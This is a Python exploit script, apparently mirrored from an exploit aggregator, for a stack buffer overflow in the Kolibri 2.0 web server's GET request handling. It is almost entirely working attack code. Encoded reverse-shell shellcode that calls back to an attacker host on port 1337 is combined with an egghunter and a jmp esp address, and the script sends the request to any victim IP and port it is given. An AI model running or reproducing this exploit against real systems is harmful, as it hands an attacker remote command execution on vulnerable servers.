Share
## https://sploitus.com/exploit?id=PACKETSTORM:173967
#!/usr/bin/python3  
# Exploit Title: Kolibri GET request buffer Overflow [Stack Egghunter]  
# Date: 2 Augst 2023  
# Exploit Author: Mahmoud NourEldin @Engacker  
# Vendor App:  
https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip  
# Version: Kolibri 2.0  
# Tested on: Windows 10  
# Description:  
# For the first time making the egghunter jumping to the begging of the  
stack  
  
import socket, time, sys, os  
  
if len(sys.argv) != 3:  
print(f"[*] Usage: {sys.argv[0]} <Ip Victime> <Port> \n[*] Exploit created  
by Mahmoud NourEldin\n[*] https://www.linkedin.com/in/tamatahyt")  
sys.exit(0)  
host = sys.argv[1]  
port = int(sys.argv[2])  
  
  
try:  
#[BadChars] \x00\x0a\x0d\x20\x3d\x3f  
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337  
EXITFUNC=thread -f py รขโ‚ฌโ€œe x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x3d\x3f"  
buf = b"w00tw00t"  
buf += b"\xba\xc7\xe5\x34\xdd\xd9\xe8\xd9\x74\x24\xf4\x58"  
buf += b"\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x97"  
buf += b"\xeb\xd6\x28\xeb\x1c\x94\xd3\x13\xdd\xf9\x5a\xf6"  
buf += b"\xec\x39\x38\x73\x5e\x8a\x4a\xd1\x53\x61\x1e\xc1"  
buf += b"\xe0\x07\xb7\xe6\x41\xad\xe1\xc9\x52\x9e\xd2\x48"  
buf += b"\xd1\xdd\x06\xaa\xe8\x2d\x5b\xab\x2d\x53\x96\xf9"  
buf += b"\xe6\x1f\x05\xed\x83\x6a\x96\x86\xd8\x7b\x9e\x7b"  
buf += b"\xa8\x7a\x8f\x2a\xa2\x24\x0f\xcd\x67\x5d\x06\xd5"  
buf += b"\x64\x58\xd0\x6e\x5e\x16\xe3\xa6\xae\xd7\x48\x87"  
buf += b"\x1e\x2a\x90\xc0\x99\xd5\xe7\x38\xda\x68\xf0\xff"  
buf += b"\xa0\xb6\x75\x1b\x02\x3c\x2d\xc7\xb2\x91\xa8\x8c"  
buf += b"\xb9\x5e\xbe\xca\xdd\x61\x13\x61\xd9\xea\x92\xa5"  
buf += b"\x6b\xa8\xb0\x61\x37\x6a\xd8\x30\x9d\xdd\xe5\x22"  
buf += b"\x7e\x81\x43\x29\x93\xd6\xf9\x70\xfc\x1b\x30\x8a"  
buf += b"\xfc\x33\x43\xf9\xce\x9c\xff\x95\x62\x54\x26\x62"  
buf += b"\x84\x4f\x9e\xfc\x7b\x70\xdf\xd5\xbf\x24\x8f\x4d"  
buf += b"\x69\x45\x44\x8d\x96\x90\xcb\xdd\x38\x4b\xac\x8d"  
buf += b"\xf8\x3b\x44\xc7\xf6\x64\x74\xe8\xdc\x0c\x1f\x13"  
buf += b"\xb7\xf2\x48\x23\x22\x9b\x8a\x53\xa9\x62\x02\xb5"  
buf += b"\xdb\x84\x42\x6e\x74\x3c\xcf\xe4\xe5\xc1\xc5\x81"  
buf += b"\x26\x49\xea\x76\xe8\xba\x87\x64\x9d\x4a\xd2\xd6"  
buf += b"\x08\x54\xc8\x7e\xd6\xc7\x97\x7e\x91\xfb\x0f\x29"  
buf += b"\xf6\xca\x59\xbf\xea\x75\xf0\xdd\xf6\xe0\x3b\x65"  
buf += b"\x2d\xd1\xc2\x64\xa0\x6d\xe1\x76\x7c\x6d\xad\x22"  
buf += b"\xd0\x38\x7b\x9c\x96\x92\xcd\x76\x41\x48\x84\x1e"  
buf += b"\x14\xa2\x17\x58\x19\xef\xe1\x84\xa8\x46\xb4\xbb"  
buf += b"\x05\x0f\x30\xc4\x7b\xaf\xbf\x1f\x38\xcf\x5d\xb5"  
buf += b"\x35\x78\xf8\x5c\xf4\xe5\xfb\x8b\x3b\x10\x78\x39"  
buf += b"\xc4\xe7\x60\x48\xc1\xac\x26\xa1\xbb\xbd\xc2\xc5"  
buf += b"\x68\xbd\xc6"  
  
egghunter =  
b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"  
egghunter +=  
b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"  
egghunter +=  
b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"  
egghunter += b"\xff\xe7"  
  
eip = b"\x42\x24\x01\x10"#0x10012442 jmp esp  
'''  
payload length is: 800byte  
EIP overwritten in 516 place which make a jmp to ESP  
ESP include the egghunter and number of CCCC  
Egghunter searching for w00tw00t+shellcode which exist in the first  
request [buf]  
Others just for place  
'''  
payload = b"\x90"*(515-len(buf))+ buf + eip + egghunter +  
(268-len(egghunter)) *b"C"  
  
#The request of the server  
request = b""  
request += b"GET /"+payload+b" HTTP/1.1\r\n"  
request += b"Host: 192.168.56.102:8080\r\n\r\n"  
  
#Connecting to the server  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print(f"[*]Sending The Evil Paylod...\nSee your reverse shell")  
s.connect((host, port))  
s.send(request)  
s.close()  
print("[x]Done")  
  
#if can't connect  
except socket.error:  
print("Could not connect!\n[*]Is IP correct? Is Port correct?Can you ping  
the machine?")